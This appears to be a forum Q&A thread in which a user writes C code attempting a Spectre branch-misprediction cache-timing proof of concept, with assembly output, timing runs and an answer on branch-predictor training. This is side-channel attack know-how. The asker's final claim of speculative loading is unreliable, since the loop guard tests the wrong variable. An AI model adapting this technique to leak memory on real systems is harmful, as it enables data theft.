0

I am trying to load "a" (lowercase a) speculatively using Spectre.

I was given a hint here:

Spectre PoC - Paper based - opposite results

that the reason it does not load speculatively could be one of the following:

  • not trained branch
  • compiler optimization

Here is the code:

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif




/*
 * Cache-timing experiment.
 *
 * Steps, in order:
 *   1. Fill array2 and flush one cache line from each of its 256 slots
 *      (one 512-byte slot per possible byte value).
 *   2. For every index of array1 except 103, store array1[i] into the
 *      array2 slot selected by array1[i].
 *   3. Time one read from the array2 slot of each candidate character
 *      ('A'..'Z', 'a', '1') in random order and print the cycle counts.
 *
 * NOTE(review): standard C expects main to return int; this definition
 * returns void.
 */
void main(void)
{
/* 104 bytes: the sequence 65..90 ('A'..'Z') four times, except that the
 * very last element (index 103) is 97 ('a') instead of 90. */
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };

/* Probe array: indexed below as value * 512, i.e. 256 slots of 512 bytes. */
uint8_t array2[256 * 512];

/* NOTE(review): i is int while sizeof yields size_t, so this comparison
 * mixes signed and unsigned operands. */
for(int i = 0; i < sizeof(array2); i++)
  array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */


/* Flush the first byte's cache line of every 512-byte slot. */
for(int i = 0; i < 256; i++)
  _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */



/* This reads array1[103] directly (a normal, non-speculative read of
 * array1); it does not touch array2. */
printf("%c is speculatively executed\n",array1[103]);



/* dummy is never used after this point. */
int dummy = 0;
/* For every index except 103, write array1[i] into the array2 slot chosen
 * by array1[i]. array1 is volatile, so array1[i] is read twice per pass.
 * The guard compares the loop counter itself against the constant 103. */
for(int i=0; i<104; i++) {
 if (i != 103) {
    array2[array1[i] * 512] = array1[i]; 
 }
}



/* NOTE(review): __rdtscp is assigned to int variables here; presumably its
 * 64-bit result is truncated -- confirm against the intrinsic's prototype. */
int t0,time_taken = 0;
/* NOTE(review): junk is int but its address is passed to __rdtscp, which is
 * documented as taking unsigned int * -- confirm. */
int junk = 0;

int mix_i=0;

 /* j is not used anywhere in this function. */
 int i,j;
    int aux,res;

    /* RandomId receives the entries of ListId in random order.
     * ListId: 'A'..'Z' (65..90), 'a' (97) and '1' (49). */
    char RandomId[28];
    char ListId[28]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,49};



    /* NOTE(review): time() is called but <time.h> is not among the includes
     * visible above this function. */
    srand(time(NULL));

    /* Random permutation by rejection: pick a random ListId index; if that
     * entry has not been taken yet, copy it and mark it taken with -1;
     * otherwise undo the loop increment (i--) and try again.
     * NOTE(review): the -1 marker stored in a plain char presumes char is
     * signed on the target. */
    for(i=0; i<28; i++)
    {
        res = rand() % 28;
        aux = ListId[res];

        if (ListId[res] != -1)
        {
            RandomId[i] = aux;
            ListId[res] = -1;
        }
        else
            i--;
    }



volatile uint8_t * addr;
/* y is never used. */
int y=0;


  /* Probe phase: for each candidate value, time a single read of the first
   * byte of its array2 slot, bracketed by two __rdtscp calls. */
  for(int i=0; i<28; i++)
  {
    mix_i = RandomId[i];
    addr = &array2[mix_i * 512];
    t0 = __rdtscp(&junk); 
    junk = *addr;
    time_taken = __rdtscp(&junk) - t0;
    /* Only the "is not cached" printf is governed by the two ifs; despite
     * its indentation, the "trying" printf below runs on every iteration. */
    if(mix_i>=49 && mix_i<=97)
      if(mix_i==49)
        printf("%c is not cached\n",mix_i); 
      printf("trying: %c time: %i\n",mix_i,time_taken);
  }
}

I think (and hope) that compiler optimization is not the problem.

2 Questions:

  1. How can I check if compiler optimized it?
  2. How can I train the branch?

Can somebody explain the second point, either using this code or with a simple example (with a code sample and gdb output)?

Thanks,

Update 1:

Compiled the sensitive fragment (for loop).

user@laptop:~/labspectre$ cat test.c
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>


/*
 * Reduced test case: only the array definitions and the guarded store loop,
 * kept separate so that the compiler's output for that loop can be inspected.
 */
void main(void)
{
/* 104 bytes: 65..90 ('A'..'Z') four times, with the last element
 * (index 103) being 97 ('a') instead of 90. */
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };

/* Indexed below as value * 512; not initialised in this fragment. */
uint8_t array2[256 * 512];


/* dummy is never used. */
int dummy = 0;
/* For every index except 103, store array1[i] into array2[array1[i] * 512].
 * The guard compares the loop counter against the constant 103. */
for(int i=0; i<104; i++) {
 if (i != 103) {
    array2[array1[i] * 512] = array1[i];
 }
}
}

Here is the asm dump:

user@laptop:~/labspectre$ cat test.s
    /* Compiler output for test.c (see the .ident line at the end). */
    .file   "test.c"
    .text
    .globl  main
    .type   main, @function
main:
.LFB2:
    .cfi_startproc
    /* Prologue: set up the frame and reserve 131328 bytes of stack. */
    pushq   %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq    %rsp, %rbp
    .cfi_def_cfa_register 6
    subq    $131328, %rsp
    /* Save the value at %fs:40 in -8(%rbp); it is compared again before
       returning, and __stack_chk_fail is called on mismatch. */
    movq    %fs:40, %rax
    movq    %rax, -8(%rbp)
    xorl    %eax, %eax
    /* Write the 104 initializer bytes one at a time to
       -131200(%rbp) .. -131097(%rbp). */
    movb    $65, -131200(%rbp)
    movb    $66, -131199(%rbp)
    movb    $67, -131198(%rbp)
    movb    $68, -131197(%rbp)
    movb    $69, -131196(%rbp)
    movb    $70, -131195(%rbp)
    movb    $71, -131194(%rbp)
    movb    $72, -131193(%rbp)
    movb    $73, -131192(%rbp)
    movb    $74, -131191(%rbp)
    movb    $75, -131190(%rbp)
    movb    $76, -131189(%rbp)
    movb    $77, -131188(%rbp)
    movb    $78, -131187(%rbp)
    movb    $79, -131186(%rbp)
    movb    $80, -131185(%rbp)
    movb    $81, -131184(%rbp)
    movb    $82, -131183(%rbp)
    movb    $83, -131182(%rbp)
    movb    $84, -131181(%rbp)
    movb    $85, -131180(%rbp)
    movb    $86, -131179(%rbp)
    movb    $87, -131178(%rbp)
    movb    $88, -131177(%rbp)
    movb    $89, -131176(%rbp)
    movb    $90, -131175(%rbp)
    movb    $65, -131174(%rbp)
    movb    $66, -131173(%rbp)
    movb    $67, -131172(%rbp)
    movb    $68, -131171(%rbp)
    movb    $69, -131170(%rbp)
    movb    $70, -131169(%rbp)
    movb    $71, -131168(%rbp)
    movb    $72, -131167(%rbp)
    movb    $73, -131166(%rbp)
    movb    $74, -131165(%rbp)
    movb    $75, -131164(%rbp)
    movb    $76, -131163(%rbp)
    movb    $77, -131162(%rbp)
    movb    $78, -131161(%rbp)
    movb    $79, -131160(%rbp)
    movb    $80, -131159(%rbp)
    movb    $81, -131158(%rbp)
    movb    $82, -131157(%rbp)
    movb    $83, -131156(%rbp)
    movb    $84, -131155(%rbp)
    movb    $85, -131154(%rbp)
    movb    $86, -131153(%rbp)
    movb    $87, -131152(%rbp)
    movb    $88, -131151(%rbp)
    movb    $89, -131150(%rbp)
    movb    $90, -131149(%rbp)
    movb    $65, -131148(%rbp)
    movb    $66, -131147(%rbp)
    movb    $67, -131146(%rbp)
    movb    $68, -131145(%rbp)
    movb    $69, -131144(%rbp)
    movb    $70, -131143(%rbp)
    movb    $71, -131142(%rbp)
    movb    $72, -131141(%rbp)
    movb    $73, -131140(%rbp)
    movb    $74, -131139(%rbp)
    movb    $75, -131138(%rbp)
    movb    $76, -131137(%rbp)
    movb    $77, -131136(%rbp)
    movb    $78, -131135(%rbp)
    movb    $79, -131134(%rbp)
    movb    $80, -131133(%rbp)
    movb    $81, -131132(%rbp)
    movb    $82, -131131(%rbp)
    movb    $83, -131130(%rbp)
    movb    $84, -131129(%rbp)
    movb    $85, -131128(%rbp)
    movb    $86, -131127(%rbp)
    movb    $87, -131126(%rbp)
    movb    $88, -131125(%rbp)
    movb    $89, -131124(%rbp)
    movb    $90, -131123(%rbp)
    movb    $65, -131122(%rbp)
    movb    $66, -131121(%rbp)
    movb    $67, -131120(%rbp)
    movb    $68, -131119(%rbp)
    movb    $69, -131118(%rbp)
    movb    $70, -131117(%rbp)
    movb    $71, -131116(%rbp)
    movb    $72, -131115(%rbp)
    movb    $73, -131114(%rbp)
    movb    $74, -131113(%rbp)
    movb    $75, -131112(%rbp)
    movb    $76, -131111(%rbp)
    movb    $77, -131110(%rbp)
    movb    $78, -131109(%rbp)
    movb    $79, -131108(%rbp)
    movb    $80, -131107(%rbp)
    movb    $81, -131106(%rbp)
    movb    $82, -131105(%rbp)
    movb    $83, -131104(%rbp)
    movb    $84, -131103(%rbp)
    movb    $85, -131102(%rbp)
    movb    $86, -131101(%rbp)
    movb    $87, -131100(%rbp)
    movb    $88, -131099(%rbp)
    movb    $89, -131098(%rbp)
    movb    $97, -131097(%rbp)
    /* Copy those 104 bytes, 8 at a time (13 moves), to the region starting
       at -131312(%rbp). That region is the one the loop indexes, so it
       holds array1. */
    movq    -131200(%rbp), %rax
    movq    %rax, -131312(%rbp)
    movq    -131192(%rbp), %rax
    movq    %rax, -131304(%rbp)
    movq    -131184(%rbp), %rax
    movq    %rax, -131296(%rbp)
    movq    -131176(%rbp), %rax
    movq    %rax, -131288(%rbp)
    movq    -131168(%rbp), %rax
    movq    %rax, -131280(%rbp)
    movq    -131160(%rbp), %rax
    movq    %rax, -131272(%rbp)
    movq    -131152(%rbp), %rax
    movq    %rax, -131264(%rbp)
    movq    -131144(%rbp), %rax
    movq    %rax, -131256(%rbp)
    movq    -131136(%rbp), %rax
    movq    %rax, -131248(%rbp)
    movq    -131128(%rbp), %rax
    movq    %rax, -131240(%rbp)
    movq    -131120(%rbp), %rax
    movq    %rax, -131232(%rbp)
    movq    -131112(%rbp), %rax
    movq    %rax, -131224(%rbp)
    movq    -131104(%rbp), %rax
    movq    %rax, -131216(%rbp)
    /* Two ints are zeroed: -131320(%rbp) is the loop counter i (it is the
       slot compared with 103 below); -131316(%rbp) is presumably dummy. */
    movl    $0, -131316(%rbp)
    movl    $0, -131320(%rbp)
    jmp .L2
.L4:
    /* Loop body: the "if (i != 103)" test; i == 103 skips the store. */
    cmpl    $103, -131320(%rbp)
    je  .L3
    /* First read of array1[i], shifted left by 9 (multiplied by 512) to
       form the array2 index. */
    movl    -131320(%rbp), %eax
    cltq
    movzbl  -131312(%rbp,%rax), %eax
    movzbl  %al, %eax
    sall    $9, %eax
    movl    %eax, %ecx
    /* Second read of array1[i]: the value to store. */
    movl    -131320(%rbp), %eax
    cltq
    movzbl  -131312(%rbp,%rax), %edx
    movslq  %ecx, %rax
    /* Byte store into the array based at -131088(%rbp), i.e. array2. */
    movb    %dl, -131088(%rbp,%rax)
.L3:
    /* i++ */
    addl    $1, -131320(%rbp)
.L2:
    /* Loop condition: continue while i <= 103. */
    cmpl    $103, -131320(%rbp)
    jle .L4
    nop
    /* Epilogue: compare the saved value with %fs:40 and call
       __stack_chk_fail if they differ. */
    movq    -8(%rbp), %rax
    xorq    %fs:40, %rax
    je  .L5
    call    __stack_chk_fail
.L5:
    leave
    .cfi_def_cfa 7, 8
    ret
    .cfi_endproc
.LFE2:
    .size   main, .-main
    .ident  "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.5) 5.4.0 20160609"
    .section    .note.GNU-stack,"",@progbits
user@laptop:~/labspectre$

To me it looks good. I see the loading of the array and then:

cmpl    $103, -131320(%rbp)
        je  .L3

Check for value of 103 in the loop.

So it is NOT optimized? Right?

Update 3:

OK, this time I think it works. I load "a" and "b" speculatively. As you can see, they are not loaded in the code.

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif




/*
 * Cache-timing experiment with a training loop.
 *
 * Steps, in order:
 *   1. Fill array2 and flush one cache line from each of its 256 slots
 *      (one 512-byte slot per possible byte value).
 *   2. Run 999 rounds of 30 passes. In each pass x is set to training_x
 *      (five passes out of six) or malicious_x (every sixth pass), and a
 *      loop guarded by "x < 103" stores array1[i] into array2 for every i.
 *   3. Time one read from the array2 slot of each candidate character
 *      ('A'..'Z', 'a', '1', 'b') in random order and print the counts.
 *
 * NOTE(review): standard C expects main to return int; this definition
 * returns void.
 */
void main(void)
{
    // 105 bytes: 'A'..'Z' (65..90) four times, except that index 103 is
    // 97 ('a') instead of 90, followed by 98 ('b') at index 104.
    volatile uint8_t array1[105] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97,98 };

    /* Probe array: indexed below as value * 512, i.e. 256 slots of 512 bytes. */
    uint8_t array2[256 * 512];

    /* NOTE(review): i is int while sizeof yields size_t, so this comparison
     * mixes signed and unsigned operands. */
    for(int i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */


    /* Flush the first byte's cache line of every 512-byte slot. This is the
     * only place in the function where array2 is flushed. */
    for(int i = 0; i < 256; i++)
        _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */



    /* This reads array1[103] and array1[104] directly (normal,
     * non-speculative reads of array1); it does not touch array2. */
    printf("%c and %c are speculatively executed/loaded\n",array1[103],array1[104]);

    /* NOTE(review): time() is called but <time.h> is not among the includes
     * visible above this function. */
    srand(time(NULL));


    /* Used as the modulus for training_x and as the address flushed in the
     * inner loop; it is not read by the "x < 103" guard below. */
    unsigned int array1_size = 16;
    /* Only j is initialised by this declaration; r is assigned just below. */
    int r,j = 0;

    r = rand();


    int tries = 0;
    size_t training_x, x;


    /* The "attack" value of x is simply one rand() result. */
    size_t malicious_x=r;
    //printf("malicious_x: %i\n",malicious_x);

    for (tries = 999; tries > 0; tries--) {

        /* Always in 0..15 because array1_size is 16, hence always < 103. */
        training_x = tries % array1_size; 

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        for (j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */

            //printf("x: %i\n",x);         
            /* dummy is never used. */
            int dummy = 0;
            /* NOTE(review): the guard tests x, which does not change inside
             * this loop, rather than the index i. Whenever x < 103 (true for
             * every training pass, since training_x is 0..15) all 105
             * elements are processed, including indices 103 ('a') and
             * 104 ('b'), so their array2 slots are written by ordinary,
             * non-speculative execution. array2 is not flushed again before
             * the timing phase. */
            for(int i=0; i<105; i++) {
                // original intent: array1[103] ("a") and array1[104] ("b")
                // are meant to be reached only speculatively
                if (x<103) {
                    array2[array1[i] * 512] = array1[i]; 
                }
            }

        }

    }



    /* NOTE(review): __rdtscp is assigned to int variables here; presumably
     * its 64-bit result is truncated -- confirm against the intrinsic's
     * prototype. */
    int t0,time_taken = 0;
    /* NOTE(review): junk is int but its address is passed to __rdtscp, which
     * is documented as taking unsigned int * -- confirm. */
    int junk = 0;

    int mix_i=0;

    int i;
    int aux,res;

    /* RandomId receives the entries of ListId in random order.
     * ListId: 'A'..'Z' (65..90), 'a' (97), '1' (49) and 'b' (98). */
    char RandomId[29];
    char ListId[29]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,49,98};




    /* Random permutation by rejection: pick a random ListId index; if that
     * entry has not been taken yet, copy it and mark it taken with -1;
     * otherwise undo the loop increment (i--) and try again.
     * NOTE(review): the -1 marker stored in a plain char presumes char is
     * signed on the target. */
    for(i=0; i<29; i++)
    {
        res = rand() % 29;
        aux = ListId[res];

        if (ListId[res] != -1)
        {
            RandomId[i] = aux;
            ListId[res] = -1;
        }
        else
            i--;
    }



    volatile uint8_t * addr;
    /* y is never used. */
    int y=0;


    /* Probe phase: for each candidate value, time a single read of the first
     * byte of its array2 slot, bracketed by two __rdtscp calls. */
    for(int i=0; i<29; i++)
    {
        mix_i = RandomId[i];
        addr = &array2[mix_i * 512];
        t0 = __rdtscp(&junk); 
        junk = *addr;
        time_taken = __rdtscp(&junk) - t0;
        /* Only the "is not cached" printf is governed by the two ifs; the
         * "trying" printf below runs on every iteration. */
        if(mix_i>=49 && mix_i<=98)
            if(mix_i==49)
                printf("%c is not cached\n",mix_i); 
        printf("trying: %c time: %i\n",mix_i,time_taken);
    }
}

Execution:

user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: P time: 96
trying: Y time: 92
trying: N time: 93
trying: A time: 118
trying: J time: 109
trying: O time: 92
trying: Z time: 92
1 is not cached
trying: 1 time: 316
trying: T time: 92
trying: X time: 93
trying: C time: 93
trying: R time: 92
trying: U time: 92
trying: G time: 92
trying: B time: 93
trying: E time: 93
trying: D time: 94
trying: M time: 93
trying: H time: 92
trying: Q time: 92
trying: V time: 93
trying: a time: 92
trying: b time: 134
trying: I time: 92
trying: L time: 93
trying: S time: 93
trying: W time: 92
trying: F time: 92
trying: K time: 270
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Y time: 96
trying: J time: 219
trying: S time: 121
trying: R time: 92
trying: O time: 93
trying: A time: 113
trying: M time: 95
trying: Q time: 95
trying: U time: 123
trying: I time: 93
trying: N time: 93
trying: Z time: 92
trying: E time: 93
trying: H time: 92
trying: W time: 93
trying: K time: 92
1 is not cached
trying: 1 time: 305
trying: b time: 93
trying: D time: 93
trying: C time: 93
trying: L time: 95
trying: T time: 92
trying: X time: 93
trying: B time: 93
trying: a time: 92
trying: G time: 93
trying: V time: 93
trying: P time: 93
trying: F time: 95
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: W time: 96
trying: L time: 328
trying: I time: 93
1 is not cached
trying: 1 time: 305
trying: T time: 101
trying: G time: 93
trying: b time: 101
trying: E time: 93
trying: H time: 93
trying: F time: 93
trying: O time: 93
trying: C time: 122
trying: Q time: 94
trying: V time: 94
trying: a time: 93
trying: B time: 93
trying: A time: 96
trying: P time: 92
trying: Y time: 97
trying: Z time: 92
trying: S time: 93
trying: N time: 92
trying: U time: 92
trying: K time: 101
trying: J time: 93
trying: X time: 93
trying: M time: 93
trying: R time: 93
trying: D time: 107
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Q time: 941
trying: M time: 109
trying: A time: 101
trying: W time: 122
trying: N time: 93
trying: R time: 133
trying: H time: 94
trying: G time: 93
trying: Z time: 92
trying: B time: 94
trying: O time: 92
trying: C time: 98
trying: Y time: 93
trying: D time: 93
trying: F time: 92
trying: U time: 93
trying: P time: 95
trying: V time: 93
trying: S time: 93
trying: b time: 101
trying: T time: 92
trying: X time: 94
trying: I time: 93
trying: L time: 93
trying: E time: 92
trying: K time: 92
1 is not cached
trying: 1 time: 288
trying: a time: 92
trying: J time: 93

Cached values take ca. 90 cycles; uncached values take ca. 300 cycles.

dev
  • 937
  • 1
  • 8
  • 23

1 Answer

1

How can I check if compiler optimized it?

Compile to assembly. For GCC this is the "-S" flag. Then compare the assembly to the code - you do, of course, need to understand how to read assembly.

How can I train the branch?

See line 59 of the example exploit- https://www.exploit-db.com/exploits/43427/

You perform the action lots of times with a value that results in the branch being taken. Then you move to the value that doesn't result in it in a way that isn't "obvious" to the processor.

Hector
  • 10,893
  • 3
  • 41
  • 44
  • Thanks. Regarding optimization, can you confirm my suspicion that it is NOT optimized? More in Update 1. – dev Jan 18 '18 at 13:58
  • It does not look optimised out, no. I imagine the if / jumps let the processor know it's coming up, so the branch predictor makes the correct decision. – Hector Jan 18 '18 at 14:19
  • Yea, I was looking at the exploit you referenced. I guess my approach is wrong since I make a very obvious check in the "if" in the loop. In the exploit there is a function taking parameter .... Do you agree that in the loop the way I have it now it seems impossible to execute code speculatively? – dev Jan 18 '18 at 14:22
  • @android_dev = it's the same one you referenced in your original question! As your code stands it's technically possible but on a modern processor extremely unlikely. Were you to use an older CPU with a more basic branch predictor it could work - but it wouldn't be of any use other than as a PoC because you aren't doing anything to retrieve the value out of it. – Hector Jan 18 '18 at 14:24
  • THANKS for your help during this Spectre exploitation journey! Well, I think this code should, if it works as you stated, speculatively read "a" (at the end of the array array1). I should see it, since "a" should have a low access time, and then I also try to load the value referenced by the '1' index (decimal 49), which should have a high access time. As I understand it, that would prove that "a" was loaded speculatively. – dev Jan 18 '18 at 14:36
  • FYI OK I think I got the PoC running. Did the training as in the exploit from the Spectre paper. See Update 3: if you are interested. – dev Jan 18 '18 at 21:20